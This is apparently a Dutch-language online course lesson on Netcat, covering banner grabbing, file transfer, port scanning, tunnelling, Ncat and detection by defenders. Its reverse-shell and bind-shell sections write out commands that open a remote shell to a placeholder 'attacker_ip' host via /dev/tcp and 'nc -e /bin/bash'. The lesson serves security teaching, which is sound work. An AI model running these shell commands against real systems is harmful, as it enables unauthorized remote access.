Cyber Security Academy · Les

Netcat: het Zwitserse zakmes

Gebruik nc voor banners, bestandsoverdracht, port forwarding en eenvoudige reverse shells.

Les 3 van 413 stappen

Netcat: het Zwitserse zakmes is een gratis Cyber Security Academy-les op CoddyKit. Dit is les 3 van 4. Je kunt 3 lessen uit dit leerpad gratis volledig lezen — daarna ontgrendelt CoddyKit PRO alle lessen, plus praktische oefeningen met een ingebouwde code-editor en een AI-tutor die 24/7 beschikbaar is. Deze les maakt deel uit van het leertraject Cyber Security Academy. Je voortgang wordt gesynchroniseerd op het web en in de CoddyKit-app. De cursus Cyber Security Academy bevat in totaal 4 lessen.

Wat is Netcat?

Netcat (nc) is een hulpmiddel dat gegevens leest en schrijft via netwerkverbindingen met TCP of UDP. Het is op vrijwel elk Unix-systeem geïnstalleerd en is onmisbaar voor foutopsporing, bestandsoverdracht en eenvoudige uitbuiting.

Basisaansluiting en servicemeldingen uitlezen

Maak verbinding met een TCP-poort om de servicemelding uit te lezen en handmatig met het protocol te werken. Dit is de eenvoudigste vorm van verkenning.

# Connect to port 80
nc 192.168.1.100 80
GET / HTTP/1.0
[Enter twice]

# Connect to SMTP
nc mail.example.com 25
# Returns: 220 mail.example.com ESMTP

Luisteren op een poort

Netcat kan met -l -p luisteren naar binnenkomende verbindingen. Dit is nuttig voor het controleren van connectiviteit, het opvangen van reverse shells en het ontvangen van bestanden.

# Listen on port 4444
nc -lvnp 4444

# -l listen
# -v verbose
# -n no DNS resolution
# -p port number

Bestandsoverdracht met Netcat

Netcat kan bestanden verzenden door ze via een verbinding door te geven. De ontvanger luistert en stuurt de uitvoer door naar een bestand. Er is geen versleuteling — gebruik dit alleen op vertrouwde netwerken.

# Receiver (runs first):
nc -lvnp 4444 > received_file.txt

# Sender:
nc 192.168.1.10 4444 < file_to_send.txt

Poorten scannen met Netcat

Netcat kan eenvoudige poortscans uitvoeren met -z (modus zonder I/O) en -w (time-out). Het is langzamer dan Nmap, maar nuttig wanneer Nmap niet beschikbaar is.

# Scan ports 20-80
nc -zv 192.168.1.100 20-80 2>&1 | grep succeeded

# With timeout:
nc -zvw2 192.168.1.100 22 80 443

Eenvoudige reverse shell

Een reverse shell laat het doel verbinding maken met de aanvaller. Dit is nuttig bij penetratieonderzoeken wanneer firewallregels inkomende verbindingen naar het doel blokkeren.

# Attacker listens:
nc -lvnp 4444

# Target executes (bash):
bash -i >& /dev/tcp/attacker_ip/4444 0>&1

# Or via nc:
nc attacker_ip 4444 -e /bin/bash

Bind shell

Een bind shell luistert op de doelcomputer. De aanvaller maakt er verbinding mee. Dit komt minder vaak voor bij moderne penetratieonderzoeken, omdat firewalls meestal inkomende verbindingen blokkeren.

# On target: listen and serve a shell
nc -lvnp 5555 -e /bin/bash

# On attacker: connect
nc target_ip 5555

UDP-modus

Gebruik -u voor UDP-verbindingen. Dit is nuttig voor het controleren van UDP-diensten zoals DNS (poort 53) en SNMP (poort 161).

# Test DNS over UDP
nc -u 8.8.8.8 53

# Test SNMP
nc -u 192.168.1.1 161

Proxyverbindingen met Netcat

Netcat kan verbindingen aan elkaar koppelen om via netwerken door te sturen. In combinatie met benoemde pipes (mkfifo) maakt het eenvoudige tweerichtingstunnels zonder extra hulpmiddelen.

mkfifo /tmp/pipe
nc -lvnp 4445 < /tmp/pipe | nc internal_host 80 > /tmp/pipe

Ncat: het moderne alternatief

Ncat (onderdeel van Nmap) breidt Netcat uit met SSL-ondersteuning (--ssl), toegangsbeheer en broker-modus. Gebruik Ncat bij voorkeur voor versleutelde kanalen.

# SSL listener
ncat --ssl -lvnp 4444

# SSL connect
ncat --ssl target_ip 4444

Verdedigers: Netcat detecteren

Netcat-verbindingen zien eruit als normaal TCP-verkeer. Verdedigers kunnen ze detecteren door procesnamen te bewaken (HIDS), ongebruikelijke uitgaande poorten te herkennen en shells te signaleren die door onverwachte ouderprocessen zijn gestart.

Snelle controle

Welke Netcat-vlag schakelt de luistermodus in?

Samenvatting: Netcat

Netcat is een fundamenteel hulpmiddel: gebruik het voor het uitlezen van servicemeldingen, bestandsoverdracht, het controleren van connectiviteit en het begrijpen van de werking van reverse en bind shells. Bij geautoriseerde penetratieonderzoeken controleert het firewallregels en simuleert het hoe een aanvaller zich door netwerken verplaatst. Leer het goed kennen — zowel om het te gebruiken als om het te detecteren.

Gratis beginnen

Leer Cyber Security Academy met een AI-tutor — gratis

Schrijf echte code en voer die uit in je browser, krijg direct hulp van een AI-tutor die 24/7 beschikbaar is en ga verder waar je gebleven bent op het web of in de app.

Cursussen
76
Lessen
303

Veelgestelde vragen

Is de les “Netcat: het Zwitserse zakmes” gratis?

Ja — je kunt hier op het web alle 3 lessen van het leerpad Cyber Security Academy, waaronder “Netcat: het Zwitserse zakmes”, gratis volledig lezen. Daarna ontgrendelt CoddyKit PRO alle lessen, plus interactieve oefeningen met een ingebouwde code-editor en een AI-tutor die 24/7 beschikbaar is. De cursus Cyber Security Academy bevat in totaal 4 lessen.

Wat leer ik in “Netcat: het Zwitserse zakmes”?

Gebruik nc voor banners, bestandsoverdracht, port forwarding en eenvoudige reverse shells. Je oefent met Cyber Security Academy door code rechtstreeks in de browser uit te voeren. Een AI-begeleider die 24/7 beschikbaar is beantwoordt je vragen terwijl je de les doorwerkt.

Heb ik ervaring nodig om met Cyber Security Academy te beginnen?

Ervaring vooraf is niet nodig. Cyber Security Academy op CoddyKit is opgebouwd voor beginners tot gevorderden, zodat je hier of bij het begin kunt starten en in je eigen tempo kunt leren. Dit is les 3 van 4.

Hoe lang duurt de les “Netcat: het Zwitserse zakmes”?

De meeste lessen van CoddyKit duren ongeveer 5–10 minuten. Elke les is kort en interactief, zodat je gestaag vooruitgaat en op het web en in de app precies verdergaat waar je was gebleven.

Kan ik code schrijven en uitvoeren in deze les over Cyber Security Academy?

Ja. Elke les over Cyber Security Academy bevat een ingebouwde code-editor, zodat je rechtstreeks in je browser echte code kunt schrijven en uitvoeren en direct feedback van AI krijgt — lokale installatie is niet nodig.

Alle lessen in deze cursus

  1. Technieken voor Nmap-poortscans
  2. Fingerprinting van services en besturingssystemen
  3. Netcat: het Zwitserse zakmes
  4. Scripting voor netwerkenumeratie
← Terug naar Cyber Security Academy